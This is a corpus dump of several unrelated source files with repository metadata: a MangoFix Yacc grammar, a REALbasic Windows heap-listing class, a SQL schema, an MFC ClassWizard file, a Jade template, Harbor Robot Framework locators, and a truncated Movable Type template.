$$ = (__bridge_retained void *)structEntry; } ; struct_entry_list: struct_entry { NSMutableArray *list = [NSMutableArray array]; MFStructEntry *structEntry = (__bridge_transfer MFStructEntry *)$1; [list addObject:structEntry]; $$ = (__bridge_retained void *)list; } | struct_entry_list COMMA struct_entry { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFStructEntry *structEntry = (__bridge_transfer MFStructEntry *)$3; [list addObject:structEntry]; $$ = (__bridge_retained void *)list; } ; struct_literal: LC struct_entry_list RC { MFStructpression *expr = (MFStructpression *)mf_create_expression(MF_STRUCT_LITERAL_EXPRESSION); NSArray *entriesExpr = (__bridge_transfer NSArray *)$2; expr.entriesExpr = entriesExpr; $$ = (__bridge_retained void *)expr; } ; c_type_identier: key_work_identifier | IDENTIFIER | VOID ASTERISK { $$ = (__bridge_retained void *)@"void *"; } | CHAR ASTERISK { $$ = (__bridge_retained void *)@"char *"; } | STRUCT IDENTIFIER { $$ = (__bridge_retained void *)[NSString stringWithFormat:@"struct %@",(__bridge_transfer NSString *)$2]; } ; c_type_identier_list:c_type_identier { NSMutableArray *list = [NSMutableArray array]; NSString *identifer = (__bridge_transfer NSString *)$1; [list addObject:identifer]; $$ = (__bridge_retained void *)list; } | c_type_identier_list COMMA c_type_identier { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; NSString *identifer = (__bridge_transfer NSString *)$3; [list addObject:identifer]; $$ = (__bridge_retained void *)list; } ; key_work_identifier: ID { $$ = (__bridge_retained void *)@"id"; } | CLASS { $$ = (__bridge_retained void *)@"class"; } | CLASS_ { $$ = (__bridge_retained void *)@"Class"; } | COPY { $$ = (__bridge_retained void *)@"copy"; } | BOOL_ { $$ = (__bridge_retained void *)@"BOOL"; } | INT { $$ = (__bridge_retained void *)@"int"; } | U_INT { $$ = (__bridge_retained void *)@"uint"; } | DOUBLE { $$ = (__bridge_retained void *)@"double"; } | SEL_ { $$ = (__bridge_retained void *)@"SEL"; } | VOID { $$ = (__bridge_retained void *)@"void"; } ; primary_expression: IDENTIFIER { MFIdentifierExpression *expr = (MFIdentifierExpression *)mf_create_expression(MF_IDENTIFIER_EXPRESSION); NSString *identifier = (__bridge_transfer NSString *)$1;; expr.identifier = identifier; $$ = (__bridge_retained void *)expr; } | ADDRESS IDENTIFIER { MFIdentifierExpression *identiferExpr = (MFIdentifierExpression *)mf_create_expression(MF_IDENTIFIER_EXPRESSION); NSString *identifier = (__bridge_transfer NSString *)$2;; identiferExpr.identifier = identifier; MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_GET_ADDRESS_EXPRESSION); expr.expr = identiferExpr; $$ = (__bridge_retained void *)expr; } | primary_expression DOT IDENTIFIER { MFMemberExpression *expr = (MFMemberExpression *)mf_create_expression(MF_MEMBER_EXPRESSION); expr.expr = (__bridge_transfer MFExpression *)$1; expr.memberName = (__bridge_transfer NSString *)$3; $$ = (__bridge_retained void *)expr; } | primary_expression DOT key_work_identifier { MFMemberExpression *expr = (MFMemberExpression *)mf_create_expression(MF_MEMBER_EXPRESSION); expr.expr = (__bridge_transfer MFExpression *)$1; expr.memberName = (__bridge_transfer NSString *)$3; $$ = (__bridge_retained void *)expr; } | primary_expression DOT selector LP RP { MFExpression *expr = (__bridge_transfer MFExpression *)$1; NSString *selector = (__bridge_transfer NSString *)$3; MFMemberExpression *memberExpr = (MFMemberExpression *)mf_create_expression(MF_MEMBER_EXPRESSION); memberExpr.expr = expr; memberExpr.memberName = selector; MFFunctonCallExpression *funcCallExpr = (MFFunctonCallExpression *)mf_create_expression(MF_FUNCTION_CALL_EXPRESSION); funcCallExpr.expr = memberExpr; $$ = (__bridge_retained void *)funcCallExpr; } | primary_expression DOT selector LP expression_list RP { MFExpression *expr = (__bridge_transfer MFExpression *)$1; NSString *selector = (__bridge_transfer NSString *)$3; MFMemberExpression *memberExpr = (MFMemberExpression *)mf_create_expression(MF_MEMBER_EXPRESSION); memberExpr.expr = expr; memberExpr.memberName = selector; MFFunctonCallExpression *funcCallExpr = (MFFunctonCallExpression *)mf_create_expression(MF_FUNCTION_CALL_EXPRESSION); funcCallExpr.expr = memberExpr; funcCallExpr.args = (__bridge_transfer NSArray<MFExpression *> *)$5; $$ = (__bridge_retained void *)funcCallExpr; } | primary_expression LP RP { MFExpression *expr = (__bridge_transfer MFExpression *)$1; MFFunctonCallExpression *funcCallExpr = (MFFunctonCallExpression *)mf_create_expression(MF_FUNCTION_CALL_EXPRESSION); funcCallExpr.expr = expr; $$ = (__bridge_retained void *)funcCallExpr; } | primary_expression LP expression_list RP { MFExpression *expr = (__bridge_transfer MFExpression *)$1; MFFunctonCallExpression *funcCallExpr = (MFFunctonCallExpression *)mf_create_expression(MF_FUNCTION_CALL_EXPRESSION); funcCallExpr.expr = expr; funcCallExpr.args = (__bridge_transfer NSArray<MFExpression *> *)$3; $$ = (__bridge_retained void *)funcCallExpr; } | LP expression RP { $$ = $2; } | primary_expression LB expression RB { MFExpression *arrExpr = (__bridge_transfer MFExpression *)$1; MFExpression *indexExpr = (__bridge_transfer MFExpression *)$3; MFSubScriptExpression *expr = (MFSubScriptExpression *)mf_create_expression(MF_SUB_SCRIPT_EXPRESSION); expr.aboveExpr = arrExpr; expr.bottomExpr = indexExpr; $$ = (__bridge_retained void *)expr; } | YES_ | NO_ | INTETER_LITERAL | DOUBLE_LITERAL | STRING_LITERAL | NIL | NULL_ | SELECTOR LP selector RP { MFExpression *expr = mf_create_expression(MF_SELECTOR_EXPRESSION); expr.selectorName = (__bridge_transfer NSString *)$3; $$ = (__bridge_retained void *)expr; } | AT INTETER_LITERAL { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | AT DOUBLE_LITERAL { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | AT STRING_LITERAL { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | AT YES_ { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | AT NO_ { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$2; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | SELF { MFExpression *expr = mf_create_expression(MF_SELF_EXPRESSION); $$ = (__bridge_retained void *)expr; } | SUPER { MFExpression *expr = mf_create_expression(MF_SUPER_EXPRESSION); $$ = (__bridge_retained void *)expr; } | AT LP expression RP { MFUnaryExpression *expr = (MFUnaryExpression *)mf_create_expression(MF_AT_EXPRESSION); MFExpression *subExpr = (__bridge_transfer MFExpression *)$3; expr.expr = subExpr; $$ = (__bridge_retained void *)expr; } | AT LB expression_list RB { MFArrayExpression *expr = (MFArrayExpression *)mf_create_expression(MF_ARRAY_LITERAL_EXPRESSION); NSArray *itemExpressions = (__bridge_transfer NSArray *)$3; expr.itemExpressions = itemExpressions; $$ = (__bridge_retained void *)expr; } | AT LB RB { MFArrayExpression *expr = (MFArrayExpression *)mf_create_expression(MF_ARRAY_LITERAL_EXPRESSION); $$ = (__bridge_retained void *)expr; } | C_FUNCTION LP expression RP { MFCFuntionExpression *expr = (MFCFuntionExpression *)mf_create_expression(MF_C_FUNCTION_EXPRESSION); MFExpression *cfunNameOrPointerExpr = (__bridge_transfer MFExpression *)$3; expr.cfunNameOrPointerExpr = cfunNameOrPointerExpr; $$ = (__bridge_retained void *)expr; } | dic | struct_literal | block_body ; block_body: POWER type_specifier LP RP block_statement { MFTypeSpecifier *returnTypeSpecifier = (__bridge_transfer MFTypeSpecifier *)$2; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$5; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,returnTypeSpecifier,nil,block); $$ = (__bridge_retained void *)expr; } |POWER type_specifier block_statement { MFTypeSpecifier *returnTypeSpecifier = (__bridge_transfer MFTypeSpecifier *)$2; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$3; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,returnTypeSpecifier,nil,block); $$ = (__bridge_retained void *)expr; } | POWER type_specifier LP function_param_list RP block_statement { MFTypeSpecifier *returnTypeSpecifier = (__bridge_transfer MFTypeSpecifier *)$2; NSArray<MFParameter *> *parameter = (__bridge_transfer NSArray<MFParameter *> *)$4; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$6; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,returnTypeSpecifier,parameter,block); $$ = (__bridge_retained void *)expr; } | POWER LP RP block_statement { MFBlockBody *block = (__bridge_transfer MFBlockBody *)$4; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,nil,nil,block); $$ = (__bridge_retained void *)expr; } | POWER block_statement { MFBlockBody *block = (__bridge_transfer MFBlockBody *)$2; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,nil,nil,block); $$ = (__bridge_retained void *)expr; } | POWER LP function_param_list RP block_statement { NSArray<MFParameter *> *parameter = (__bridge_transfer NSArray<MFParameter *> *)$3; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$5; MFBlockExpression *expr = (MFBlockExpression *)mf_create_expression(MF_BLOCK_EXPRESSION); mf_build_block_expr(expr,nil,parameter,block); $$ = (__bridge_retained void *)expr; } ; function_param_list: function_param { NSMutableArray *list = [NSMutableArray array]; MFParameter *parameter = (__bridge_transfer MFParameter *)$1; [list addObject:parameter]; $$ = (__bridge_retained void *)list; } | function_param_list COMMA function_param { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFParameter *parameter = (__bridge_transfer MFParameter *)$3; [list addObject:parameter]; $$ = (__bridge_retained void *)list; } ; function_param: type_specifier IDENTIFIER { MFTypeSpecifier *type = (__bridge_transfer MFTypeSpecifier *)$1; NSString *name = (__bridge_transfer NSString *)$2; MFParameter *parameter = mf_create_parameter(type, name); $$ = (__bridge_retained void *)parameter; } ; declaration_statement: declaration SEMICOLON { MFDeclaration *declaration = (__bridge_transfer MFDeclaration *)$1; MFDeclarationStatement *statement = mf_create_declaration_statement(declaration); $$ = (__bridge_retained void *)statement; } declaration_modifier:__WEAK { $$ = MFDeclarationModifierWeak; } | __STRONG { $$ = MFDeclarationModifierStrong; } | STATIC { $$ = MFDeclarationModifierStatic; } ; declaration_modifier_list:declaration_modifier | declaration_modifier_list declaration_modifier { $$ = $1 | $2; } ; declaration: declaration_modifier_list type_specifier IDENTIFIER { MFTypeSpecifier *type = (__bridge_transfer MFTypeSpecifier *)$2; NSString *name = (__bridge_transfer NSString *)$3; MFDeclaration *declaration = mf_create_declaration($1,type, name, nil); $$ = (__bridge_retained void *)declaration; } | declaration_modifier_list type_specifier IDENTIFIER ASSIGN expression { MFTypeSpecifier *type = (__bridge_transfer MFTypeSpecifier *)$2; NSString *name = (__bridge_transfer NSString *)$3; MFExpression *initializer = (__bridge_transfer MFExpression *)$5; MFDeclaration *declaration = mf_create_declaration($1,type, name, initializer); $$ = (__bridge_retained void *)declaration; } | type_specifier IDENTIFIER { MFTypeSpecifier *type = (__bridge_transfer MFTypeSpecifier *)$1; NSString *name = (__bridge_transfer NSString *)$2; MFDeclaration *declaration = mf_create_declaration(MFDeclarationModifierNone,type, name, nil); $$ = (__bridge_retained void *)declaration; } | type_specifier IDENTIFIER ASSIGN expression { MFTypeSpecifier *type = (__bridge_transfer MFTypeSpecifier *)$1; NSString *name = (__bridge_transfer NSString *)$2; MFExpression *initializer = (__bridge_transfer MFExpression *)$4; MFDeclaration *declaration = mf_create_declaration(MFDeclarationModifierNone,type, name, initializer); $$ = (__bridge_retained void *)declaration; } ; if_statement: IF LP expression RP block_statement { MFExpression *condition = (__bridge_transfer MFExpression *)$3; MFBlockBody *thenBlock = (__bridge_transfer MFBlockBody *)$5; MFIfStatement *statement = mf_create_if_statement(condition, thenBlock, nil, nil); $$ = (__bridge_retained void *)statement; } | IF LP expression RP block_statement ELSE block_statement { MFExpression *condition = (__bridge_transfer MFExpression *)$3; MFBlockBody *thenBlock = (__bridge_transfer MFBlockBody *)$5; MFBlockBody *elseBlocl = (__bridge_transfer MFBlockBody *)$7; MFIfStatement *statement = mf_create_if_statement(condition, thenBlock, nil, elseBlocl); $$ = (__bridge_retained void *)statement; } | IF LP expression RP block_statement else_if_list { MFExpression *condition = (__bridge_transfer MFExpression *)$3; MFBlockBody *thenBlock = (__bridge_transfer MFBlockBody *)$5; NSArray<MFElseIf *> *elseIfList = (__bridge_transfer NSArray<MFElseIf *> *)$6; MFIfStatement *statement = mf_create_if_statement(condition, thenBlock, elseIfList, nil); $$ = (__bridge_retained void *)statement; } | IF LP expression RP block_statement else_if_list ELSE block_statement { MFExpression *condition = (__bridge_transfer MFExpression *)$3; MFBlockBody *thenBlock = (__bridge_transfer MFBlockBody *)$5; NSArray<MFElseIf *> *elseIfList = (__bridge_transfer NSArray<MFElseIf *> *)$6; MFBlockBody *elseBlocl = (__bridge_transfer MFBlockBody *)$8; MFIfStatement *statement = mf_create_if_statement(condition, thenBlock, elseIfList, elseBlocl); $$ = (__bridge_retained void *)statement; } ; else_if_list: else_if { NSMutableArray *list = [NSMutableArray array]; MFElseIf *elseIf = (__bridge_transfer MFElseIf *)$1; [list addObject:elseIf]; $$ = (__bridge_retained void *)list; } | else_if_list else_if { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFElseIf *elseIf = (__bridge_transfer MFElseIf *)$2; [list addObject:elseIf]; $$ = (__bridge_retained void *)list; } ; else_if: ELSE IF LP expression RP block_statement { MFExpression *condition = (__bridge_transfer MFExpression *)$4; MFBlockBody *thenBlock = (__bridge_transfer MFBlockBody *)$6; MFElseIf *elseIf = mf_create_else_if(condition, thenBlock); $$ = (__bridge_retained void *)elseIf; } ; switch_statement: SWITCH LP expression RP LC case_list default_opt RC { MFExpression *expr = (__bridge_transfer MFExpression *)$3; NSArray<MFCase *> *caseList = (__bridge_transfer NSArray *)$6; MFBlockBody *defaultBlock = (__bridge_transfer MFBlockBody *)$7; MFSwitchStatement *statement = mf_create_switch_statement(expr,caseList, defaultBlock); $$ = (__bridge_retained void *)statement; } ; case_list: one_case { NSMutableArray *list = [NSMutableArray array]; MFCase *case_ = (__bridge_transfer MFCase *)$1; [list addObject:case_]; $$ = (__bridge_retained void *)list; } | case_list one_case { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFCase *case_ = (__bridge_transfer MFCase *)$2; [list addObject:case_]; $$ = (__bridge_retained void *)list; } ; one_case: CASE expression COLON block_statement { MFExpression *expr = (__bridge_transfer MFExpression *)$2; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$4; MFCase *case_ = mf_create_case(expr, block); $$ = (__bridge_retained void *)case_; } ; default_opt: /* empty */ { $$ = nil; } | DEFAULT COLON block_statement { $$ = $3; } ; expression_opt: /* empty */ { $$ = nil; } | expression ; for_statement: FOR LP expression_opt SEMICOLON expression_opt SEMICOLON expression_opt RP block_statement { MFExpression *initializerExpr = (__bridge_transfer MFExpression *)$3; MFExpression *condition = (__bridge_transfer MFExpression *)$5; MFExpression *post = (__bridge_transfer MFExpression *)$7; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$9; MFForStatement *statement = mf_create_for_statement(initializerExpr, nil, condition, post, block); $$ = (__bridge_retained void *)statement; } | FOR LP declaration SEMICOLON expression_opt SEMICOLON expression_opt RP block_statement { MFDeclaration *declaration = (__bridge_transfer MFDeclaration *)$3; MFExpression *condition = (__bridge_transfer MFExpression *)$5; MFExpression *post = (__bridge_transfer MFExpression *)$7; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$9; MFForStatement *statement = mf_create_for_statement(nil, declaration, condition, post, block); $$ = (__bridge_retained void *)statement; } ; while_statement: WHILE LP expression RP block_statement { MFExpression *condition = (__bridge_transfer MFExpression *)$3; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$5; MFWhileStatement *statement = mf_create_while_statement( condition, block); $$ = (__bridge_retained void *)statement; } ; do_while_statement: DO block_statement WHILE LP expression RP SEMICOLON { MFBlockBody *block = (__bridge_transfer MFBlockBody *)$2; MFExpression *condition = (__bridge_transfer MFExpression *)$5; MFDoWhileStatement *statement = mf_create_do_while_statement(block, condition); $$ = (__bridge_retained void *)statement; } ; foreach_statement: FOR LP type_specifier IDENTIFIER IN expression RP block_statement { MFTypeSpecifier *typeSpecifier = (__bridge_transfer MFTypeSpecifier *)$3; NSString *varName = (__bridge_transfer NSString *)$4; MFExpression *arrayExpr = (__bridge_transfer MFExpression *)$6; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$8; MFForEachStatement *statement = mf_create_for_each_statement(typeSpecifier, varName, arrayExpr, block); $$ = (__bridge_retained void *)statement; } | FOR LP IDENTIFIER IN expression RP block_statement { NSString *varName = (__bridge_transfer NSString *)$3; MFExpression *arrayExpr = (__bridge_transfer MFExpression *)$5; MFBlockBody *block = (__bridge_transfer MFBlockBody *)$7; MFForEachStatement *statement = mf_create_for_each_statement(nil, varName, arrayExpr, block); $$ = (__bridge_retained void *)statement; } ; continue_statement: CONTINUE SEMICOLON { MFContinueStatement *statement = mf_create_continue_statement(); $$ = (__bridge_retained void *)statement; } ; break_statement: BREAK SEMICOLON { MFBreakStatement *statement = mf_create_break_statement(); $$ = (__bridge_retained void *)statement; } ; return_statement: RETURN expression_opt SEMICOLON { MFExpression *expr = (__bridge_transfer MFExpression *)$2; MFReturnStatement *statement = mf_create_return_statement(expr); $$ = (__bridge_retained void *)statement; } ; expression_statement:expression SEMICOLON { MFExpression *expr = (__bridge_transfer MFExpression *)$1; MFExpressionStatement *statement = mf_create_expression_statement(expr); $$ = (__bridge_retained void *)statement; } ; block_statement: LC { MFBlockBody *block = mf_open_block_statement(); $<block_statement>$ = (__bridge_retained void *)block; } RC { MFBlockBody *block = (__bridge_transfer MFBlockBody *)$<block_statement>2; block = mf_close_block_statement(block,nil); $$ = (__bridge_retained void *)block; } | LC { MFBlockBody *block = mf_open_block_statement(); $<block_statement>$ = (__bridge_retained void *)block; } statement_list RC { MFBlockBody *block = (__bridge_transfer MFBlockBody *)$<block_statement>2; NSArray *list = (__bridge_transfer NSArray *)$3; block = mf_close_block_statement(block,list); $$ = (__bridge_retained void *)block; } ; statement_list: statement { NSMutableArray *list = [NSMutableArray array]; MFStatement *statement = (__bridge_transfer MFStatement *)$1; [list addObject:statement]; $$ = (__bridge_retained void *)list; } | statement_list statement { NSMutableArray *list = (__bridge_transfer NSMutableArray *)$1; MFStatement *statement = (__bridge_transfer MFStatement *)$2; [list addObject:statement]; $$ = (__bridge_retained void *)list; } ; statement: declaration_statement | if_statement | switch_statement | for_statement | foreach_statement | while_statement | do_while_statement | break_statement | continue_statement | return_statement | expression_statement ; top_statement: declaration_statement | if_statement | switch_statement | for_statement | foreach_statement | while_statement | do_while_statement | expression_statement ; %%
Yacc
5
SilverFruity/Mango
MangoFix/Compiler/lex_yacc/mango.y
[ "MIT" ]
#tag Class Protected Class HeapListInformationWFS #tag Method, Flags = &h0 Sub Constructor() // Default constructor, do nothing End Sub #tag EndMethod #tag Method, Flags = &h0 Sub Constructor(mb as MemoryBlock) // Make sure our data is sane if mb = nil or mb.Long( 0 ) <> mb.Size then return OwnerProcessID = mb.Long( 4 ) HeapListID = mb.Long( 8 ) dim flags as Integer flags = mb.Long( 12 ) Const HF32_DEFAULT = 1 Const HF32_SHARED = 2 DefaultHeap = Bitwise.BitAnd( flags, HF32_DEFAULT ) <> 0 SharedHeap = Bitwise.BitAnd( flags, HF32_SHARED ) <> 0 End Sub #tag EndMethod #tag Method, Flags = &h0 Sub LoadHeapEntries(entryCallback as HeapEntryLoadedCallbackWFS = nil) #if TargetWin32 Soft Declare Function Heap32First Lib "Kernel32" ( heapEntry as Ptr, processID as Integer, heapID as Integer ) as Boolean Soft Declare Function Heap32Next Lib "Kernel32" ( entry as Ptr ) as Integer dim mb as new MemoryBlock( 36 ) dim entry as HeapEntryInformationWFS mb.Long( 0 ) = mb.Size if not Heap32First( mb, OwnerProcessID, HeapListID ) then return dim good as Integer do entry = new HeapEntryInformationWFS( mb ) HeapEntries.Append( entry ) if entryCallback <> nil then if entryCallback.HeapEntryLoaded( entry ) then return end if good = Heap32Next( mb ) loop until good = 0 #else #pragma unused entryCallback #endif End Sub #tag EndMethod #tag Property, Flags = &h0 DefaultHeap As Boolean #tag EndProperty #tag Property, Flags = &h0 HeapEntries(-1) As HeapEntryInformationWFS #tag EndProperty #tag Property, Flags = &h0 HeapListID As Integer #tag EndProperty #tag Property, Flags = &h0 OwnerProcessID As Integer #tag EndProperty #tag Property, Flags = &h0 SharedHeap As Boolean #tag EndProperty #tag ViewBehavior #tag ViewProperty Name="DefaultHeap" Group="Behavior" InitialValue="0" Type="Boolean" #tag EndViewProperty #tag ViewProperty Name="HeapListID" Group="Behavior" InitialValue="0" Type="Integer" #tag EndViewProperty #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="OwnerProcessID" Group="Behavior" InitialValue="0" Type="Integer" #tag EndViewProperty #tag ViewProperty Name="SharedHeap" Group="Behavior" InitialValue="0" Type="Boolean" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" InheritedFrom="Object" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" InheritedFrom="Object" #tag EndViewProperty #tag EndViewBehavior End Class #tag EndClass
REALbasic
4
bskrtich/WFS
Windows Functionality Suite/Process Management/Classes/HeapListInformationWFS.rbbas
[ "MIT" ]
CREATE TABLE `q_user_log` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `uid` int(11) unsigned NOT NULL DEFAULT '0', `type` varchar(20) DEFAULT NULL, `level` tinyint(1) DEFAULT NULL, `code` varchar(20) DEFAULT NULL, `string` varchar(255) DEFAULT NULL, `message` varchar(255) DEFAULT NULL, `create_time` timestamp NULL DEFAULT NULL, `status` tinyint(1) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
SQL
3
imtbkcat/tidb-lightning
tests/tool_241/data/qyjc.q_user_log-schema.sql
[ "Apache-2.0" ]
; CLW file contains information for the MFC ClassWizard [General Info] Version=1 ClassCount=2 ResourceCount=2 NewFileInclude1=#include "stdafx.h" Class1=CChildFrame LastClass=CPortView LastTemplate=CView Resource1=IDR_PORT Class2=CPortView Resource2=IDD_FORMVIEW [CLS:CChildFrame] Type=0 HeaderFile=ChildFrame.h ImplementationFile=ChildFrame.cpp BaseClass=CMDIChildWnd Filter=M LastObject=CChildFrame VirtualFilter=mfWC [MNU:IDR_PORT] Type=1 Class=? Command1=ID_FILE_NEW Command2=ID_FILE_OPEN Command3=ID_FILE_CLOSE Command4=ID_FILE_SAVE Command5=ID_FILE_SAVE_AS Command6=ID_FILE_PRINT Command7=ID_FILE_PRINT_PREVIEW Command8=ID_FILE_PRINT_SETUP Command9=ID_FILE_SEND_MAIL Command10=ID_FILE_MRU_FILE1 Command11=ID_APP_EXIT Command12=ID_EDIT_UNDO Command13=ID_EDIT_CUT Command14=ID_EDIT_COPY Command15=ID_EDIT_PASTE Command16=ID_EDIT_RENAME Command17=ID_VIEW_TOOLBAR Command18=ID_VIEW_STATUS_BAR Command19=ID_VIEW_OPTIONS Command20=ID_VIEW_REFRESH Command21=ID_VIEW_CLASSHEIRARCHY Command22=ID_WINDOW_NEW Command23=ID_WINDOW_CASCADE Command24=ID_WINDOW_TILE_HORZ Command25=ID_WINDOW_ARRANGE Command26=ID_APP_ABOUT CommandCount=26 [DLG:IDD_FORMVIEW] Type=1 Class=CPortView ControlCount=19 Control1=IDC_STATIC,static,1342308352 Control2=IDC_COMBO1,combobox,1344340227 Control3=IDC_STATIC,static,1342308352 Control4=IDC_LIST1,SysListView32,1350631957 Control5=IDC_BUTTON1,button,1342242816 Control6=IDC_BUTTON3,button,1342242816 Control7=IDC_BUTTON4,button,1342242816 Control8=IDC_BUTTON2,button,1342242816 Control9=IDC_STATIC,static,1342308352 Control10=IDC_EDIT1,edit,1484849280 Control11=IDC_BUTTON5,button,1342242816 Control12=IDC_STATIC,static,1342308352 Control13=IDC_EDIT2,edit,1350633600 Control14=IDC_BUTTON6,button,1342242816 Control15=IDC_BUTTON7,button,1342242816 Control16=IDC_STATIC,static,1342308352 Control17=IDC_EDIT3,edit,1350633600 Control18=IDC_BUTTON8,button,1342242816 Control19=IDC_BUTTON9,button,1342242816 [CLS:CPortView] Type=0 HeaderFile=PortView.h ImplementationFile=PortView.cpp BaseClass=CFormView Filter=D VirtualFilter=VWC LastObject=IDC_BUTTON7
Clarion
2
CarysT/medusa
Tools/InterfaceContextPort/InterfaceContextPort.clw
[ "MIT" ]
form.modal-body.eu-confirmation .modal-body-content .checkbox label.control-label(for="eu-confirmation-checkbox") input#eu-confirmation-checkbox(type="checkbox" value="" checked=view.state.get('euConfirmationGranted')) span(data-i18n="signup.eu_confirmation") p em a(href="/privacy#place-of-processing", target="_blank", data-i18n="signup.eu_confirmation_place_of_processing") br br case view.signupState.get('path') when 'student' p.small(data-i18n="signup.eu_confirmation_student") when 'individual' p.small(data-i18n="signup.eu_confirmation_individual") // In reverse order for tabbing purposes .history-nav-buttons button.forward-button.btn.btn-lg.btn-navy(type='button', disabled=!view.state.get('euConfirmationGranted')) span(data-i18n="common.continue") button.back-button.btn.btn-lg.btn-navy-alt(type='button') span(data-i18n="common.back")
Jade
3
cihatislamdede/codecombat
app/templates/core/create-account-modal/eu-confirmation-view.jade
[ "CC-BY-4.0", "MIT" ]
# Copyright Project Harbor Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License *** Settings *** Documentation This resource provides any keywords related to the Harbor private registry appliance *** Variables *** ${artifact_action_xpath} //clr-dg-action-bar/clr-dropdown/span[contains(@class,'dropdown-toggle')] ${artifact_action_delete_xpath} //clr-dropdown-menu//div[contains(.,'Delete')] ${artifact_action_copy_xpath} //clr-dropdown-menu//div[contains(.,'Copy') and @aria-label='retag'] ${artifact_achieve_icon} //artifact-list-tab//clr-datagrid//clr-dg-row[contains(.,'sha256')]//clr-dg-cell[1]//clr-tooltip//a ${artifact_rows} //artifact-list-tab//clr-datagrid//clr-dg-row[contains(.,'sha256')] ${archive_rows} //artifact-list-tab//clr-datagrid//clr-dg-row[contains(.,'sha256')]//clr-dg-cell[1]//clr-tooltip//a ${artifact_list_spinner} xpath=//clr-datagrid//clr-spinner ${artifact_tag_component} xpath=//artifact-tag ${add_tag_button} xpath=//*[@id='new-tag'] ${tag_name_xpath} xpath=//*[@id='name'] ${add_ok_button} xpath=//*[@id='add-ok'] ${delete_tag_button} xpath=//*[@id='delete-tag'] ${dialog_delete_button} xpath=//clr-modal//button[contains(.,'DELETE')]
RobotFramework
3
kschu91/harbor
tests/resources/Harbor-Pages/Project-Artifact-Elements.robot
[ "Apache-2.0" ]
<mt:Unless regex_replace="/\s*\n+/g","\n"><mt:Ignore> # ======================= # # ブログトップページ # # 必須プラグイン: PageBute # # ======================= </mt:Ignore> <!DOCTYPE html> <html lang="<mt:BlogLanguage />"> <head> <mt:Include module="コンフィグ-共通" /> <mt:Include module="コンフィグ-ブログトップページ" /> <mt:Include module="head要素" /> </head> <body class="<mt:Var name="ec_body_class" />"> <mt:Include module="ヘッダ" /> <mt:Include module="ナビ-グローバルナビ" /> <div class="contents"> <div class="contents-header"> <div class="container"> <h1 class="contents-header-title"><mt:Var name="ec_blog_contents_label" /></h1> <!-- /.container --></div> <!-- /.contents-header --></div> <div class="container"> <div class="row"> <div class="col-md-12 col-lg-9"> <main class="main" role="main"> <mt:WidgetSet name="コンテンツ-本文の前-ブログ" /> <mt:PageContents count="$ec_search_count" navi_count="5" abs2rel="1"> <mt:Entries lastn="9999"> <mt:PageContentsHeader> <div class="archive-list archive-list-<mt:Var name="ec_component" />"> <mt:If name="ec_component" eq="card"> <div class="row js-flatheight"> </mt:If> </mt:PageContentsHeader> <mt:If name="ec_component" eq="body"> <mt:Include module="コンフィグ-記事ループ" /> <mt:Include module="記事ループ-本文" /> <mt:ElseIf eq="card"> <div class="col-sm-4"> <mt:Include module="記事ループ-カード" /> <!-- /.col-sm-4 --></div> <mt:ElseIf eq="headline"> <mt:Include module="記事ループ-ヘッドライン" /> <mt:ElseIf eq="listgroup"> <mt:Include module="記事ループ-リストグループ" date="0" /> <mt:ElseIf eq="none"> 